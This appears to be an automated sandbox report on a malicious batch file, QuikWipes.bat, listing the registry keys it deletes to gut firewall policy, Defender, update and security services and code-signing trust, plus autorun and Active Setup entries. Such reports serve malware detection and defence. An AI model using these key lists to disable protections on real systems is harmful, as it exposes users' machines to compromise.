Malware Analysis Report

2024-10-19 11:02

Sample ID 240524-e1x69adb4z
Target QuikWipes.bat
SHA256 6d6c1778838f50e53bf5f2858df28d4f7e50c376c4018d7a7ce1036ff99730f2
Tags
adware evasion persistence spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

6d6c1778838f50e53bf5f2858df28d4f7e50c376c4018d7a7ce1036ff99730f2

Threat Level: Known bad

The file QuikWipes.bat was found to be: Known bad.

Malicious Activity Summary

adware evasion persistence spyware stealer

Modifies firewall policy service

Modifies security service

Adds autorun key to be loaded by Explorer.exe on startup

Modifies Installed Components in the registry

Sets file execution options in registry

Manipulates Digital Signatures

Registers new Print Monitor

Registers COM server for autorun

Reads user/profile data of web browsers

Modifies system executable filetype association

Maps connected drives based on registry

Installs/modifies Browser Helper Object

Adds Run key to start application

Drops file in System32 directory

Drops file in Windows directory

Suspicious behavior: LoadsDriver

Checks processor information in registry

Checks SCSI registry key(s)

Uses Volume Shadow Copy service COM API

Modifies registry key

Suspicious use of WriteProcessMemory

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Enumerates system info in registry

Modifies Internet Explorer settings

Kills process with taskkill

Uses Task Scheduler COM API

Uses Volume Shadow Copy WMI provider

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-24 04:25

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-24 04:25

Reported

2024-05-24 04:29

Platform

win7-20240221-en

Max time kernel

261s

Max time network

133s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\QuikWipes.bat"

Signatures

Adds autorun key to be loaded by Explorer.exe on startup

persistence
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad C:\Windows\system32\reg.exe N/A

Modifies firewall policy service

evasion
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Static C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\Logging C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\DomainProfile C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\Logging C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\AuthorizedApplications C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\GloballyOpenPorts C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Static\System C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\Logging C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\DomainProfile C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\Logging C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\Logging C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Static C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\Logging C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\PublicProfile C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Static\System C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\AuthorizedApplications C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\GloballyOpenPorts C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\PublicProfile C:\Windows\system32\reg.exe N/A

Modifies security service

evasion
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Security C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet002\services\WinDefend\TriggerInfo\0 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet002\services\wuauserv\Security C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet002\services\wscsvc\Parameters C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\TriggerInfo\0 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Security C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet002\services\WinDefend\TriggerInfo C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Parameters C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\TriggerInfo C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet002\services\WinDefend\Parameters C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet002\services\wscsvc\Security C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet002\services\wuauserv\Parameters C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Security C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Parameters C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet002\services\MpsSvc\Security C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet002\services\WinDefend\Security C:\Windows\system32\reg.exe N/A

Manipulates Digital Signatures

Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPublisher C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\Certificate\{189A3842-3041-11D1-85E1-00C04FC295EE} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\Certificate\{64B9D180-8DA2-11CF-8736-00AA00A485EB} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{C6B2E8D0-E005-11CF-A134-00C04FD7BF43} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Certificate\{64B9D180-8DA2-11CF-8736-00AA00A485EB} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Message\{D41E4F1D-A407-11D1-8BC9-00C04FA30A41} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{C689AABA-8E78-11D0-8C47-00C04FC295EE} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{DE351A42-8E59-11D0-8C47-00C04FC295EE} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{DE351A42-8E59-11D0-8C47-00C04FC295EE} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2130 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\Message\{573E31F8-DDBA-11D0-8CCB-00C04FC295EE} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2003 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{189A3842-3041-11D1-85E1-00C04FC295EE} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2009 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{C689AAB9-8E78-11D0-8C47-00C04FC295EE} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.16.1.1 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{DE351A43-8E59-11D0-8C47-00C04FC295EE} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2002 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\Certificate\{573E31F8-DDBA-11D0-8CCB-00C04FC295EE} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\Certificate\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{000C10F1-0000-0000-C000-000000000046} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck\{573E31F8-AABA-11D0-8CCB-00C04FC295EE} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Cleanup\{FC451C16-AC75-11D1-B4B8-00C04FB66EA0} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{C689AAB8-8E78-11D0-8C47-00C04FC295EE} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{000C10F1-0000-0000-C000-000000000046} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.1.26 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Message\{D41E4F1F-A407-11D1-8BC9-00C04FA30A41} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{1A610570-38CE-11D4-A2A3-00104BD35090} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2130 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{573E31F8-AABA-11D0-8CCB-00C04FC295EE} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindLocalizedName\LocalizedNames C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{C689AAB8-8E78-11D0-8C47-00C04FC295EE} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.16.1.1 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2004 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\CertCheck\{F750E6C3-38EE-11D1-85E5-00C04FC295EE} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{573E31F8-DDBA-11D0-8CCB-00C04FC295EE} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Usages C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{C689AAB8-8E78-11D0-8C47-00C04FC295EE} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\Usages\1.3.6.1.5.5.7.3.2 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.67.1.1!7 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{C689AAB8-8E78-11D0-8C47-00C04FC295EE} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck\{F750E6C3-38EE-11D1-85E5-00C04FC295EE} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Certificate\{7801EBD0-CF4B-11D0-851F-0060979387EA} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{573E31F8-DDBA-11D0-8CCB-00C04FC295EE} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{F750E6C3-38EE-11D1-85E5-00C04FC295EE} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.1.20 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\Message\{D41E4F1F-A407-11D1-8BC9-00C04FA30A41} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{DE351A43-8E59-11D0-8C47-00C04FC295EE} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{06C9E010-38CE-11D4-A2A3-00104BD35090} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 1\CertDllVerifyCTLUsage C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\FinalPolicy C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CertDllVerifyRevocation C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.1.27 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{06C9E010-38CE-11D4-A2A3-00104BD35090} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\DiagnosticPolicy\{1A6631C0-3EA2-11D1-AE01-006097C6A9AA} C:\Windows\system32\reg.exe N/A

Modifies Installed Components in the registry

persistence
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{09CCBE8E-B964-30EF-AE84-6537AB4197F9} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9381D8F2-0288-11D0-9501-00AA00B911A5} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{45ea75a0-a269-11d1-b5bf-0000f8051515} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{6BF52A52-394A-11d3-B153-00C04F79FAA6} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{7790769C-0471-11d2-AF11-00C04FA35D02} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{9381D8F2-0288-11D0-9501-00AA00B911A5} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{6BF52A52-394A-11d3-B153-00C04F79FAA6} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{de5aed00-a4bf-11d1-9948-00c04f98bbc9} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{25FFAAD0-F4A3-4164-95FF-4461E9F35D51} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{44BBA840-CC51-11CF-AAFA-00AA00B6015C} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{4f645220-306d-11d2-995d-00c04f98bbc9} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{630b1da0-b465-11d1-9948-00c04f98bbc9} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4340} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{23A20C3C-2ADD-4A80-AFB4-C146F8847D79} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4340} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{2C7339CF-2B09-4501-B3F3-F3508C9228ED} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{5fd399c0-a70a-11d1-9948-00c04f98bbc9} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{22d6f312-b0f6-11d0-94ab-0080c74c7e95} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{45ea75a0-a269-11d1-b5bf-0000f8051515} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{22d6f312-b0f6-11d0-94ab-0080c74c7e95} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{5fd399c0-a70a-11d1-9948-00c04f98bbc9} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{89B4C1CD-B018-4511-B0A1-5476DBF70820} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{3af36230-a269-11d1-b5bf-0000f8051515} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{CE4BC71D-A88B-4943-BB3D-AF9C0E7D4387} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{de5aed00-a4bf-11d1-9948-00c04f98bbc9} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{4f645220-306d-11d2-995d-00c04f98bbc9} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383} C:\Windows\system32\reg.exe N/A
